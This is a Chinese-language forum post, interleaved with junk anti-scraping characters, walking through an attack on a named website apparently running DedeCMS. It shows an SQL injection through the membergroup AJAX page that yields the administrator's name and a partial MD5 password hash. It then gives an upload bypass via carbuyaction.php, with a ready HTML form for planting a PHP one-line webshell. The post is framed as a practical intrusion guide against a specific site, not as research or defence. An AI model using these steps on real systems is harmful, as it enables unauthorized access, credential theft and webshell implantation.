①注入漏洞。. S- Z- g2 J3 J
这站 http://www.political-security.com/1 Y3 b% E) R1 r1 P& D
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,; G, W9 _# q# b# u! _
www.political-security.com/data/mysql_error_trace.inc 爆后台
. W( b# Y5 ^0 F) K$ @然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。 W* g' u; Z) H
然后写上语句 . O* H4 I7 g \. u3 ]
查看管理员帐号: C" K- w) `/ B j
http://www.political-security.co ... &membergroup=@`3 g- @3 I2 ^8 U l
; W/ r3 l+ I% t" c. p8 I* r
admin
# J" k% S! V `: Q" u* K, M$ n( P6 Z! }- M7 z0 N6 u& v
查看管理员密码
7 v1 w( V# N5 I) \ http://www.political-security.co ... &membergroup=@`! a' B; o8 q) `; c
' F$ `/ P$ m: D# ~. @' v7 j. n& y8d29b1ef9f8c5a5af429, T3 h" F2 Q0 t1 @, A. L6 n1 ^
; D1 L7 Q( \8 B9 m1 j' S
查看管理员密码0 ~* @3 Q4 ?$ x$ v& R; \. @
# h: o# |: l! Q; i+ ~
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5 m- \. }& Y: W$ L. {
1 @ U3 r+ N# R, z$ I, F+ B1 |8d24 _' @7 w& C' g
9b1ef9f8c5a5af42
* s& s' ?) k4 V9) x1 i/ O$ Q: h' A
3 L9 e1 s6 g4 ^3 I7 V8 x1 j9 T6 g5 Mcmd5没解出来 只好测试第二个方法
5 {7 b# t6 {* `+ U6 o
& @# w) y* p" l8 n/ f. A* S
- g3 X: p( @' a/ U2 o, o! q$ A②上传漏洞:
9 a4 c3 { z3 c; |* P" @% Q7 d: E a) a
只要登陆会员中心,然后访问页面链接- ~9 Y5 Y: z" r
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
5 C% k% w9 @2 ^% l' e& W5 o/ d
. M# k8 a3 U! f$ _如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
6 D. j! v8 F! c
9 a2 C, d) C+ l5 [2 b: w1 M. h" e* K于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm4 T, u/ l7 T* _0 w+ d3 [2 J
: ^; g- `/ Y4 h. \# i8 ^7 x<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
1 x$ t' W& K: y' M4 c+ m9 n* k' A或者5 [& P; P0 A& f
即可上传成功 |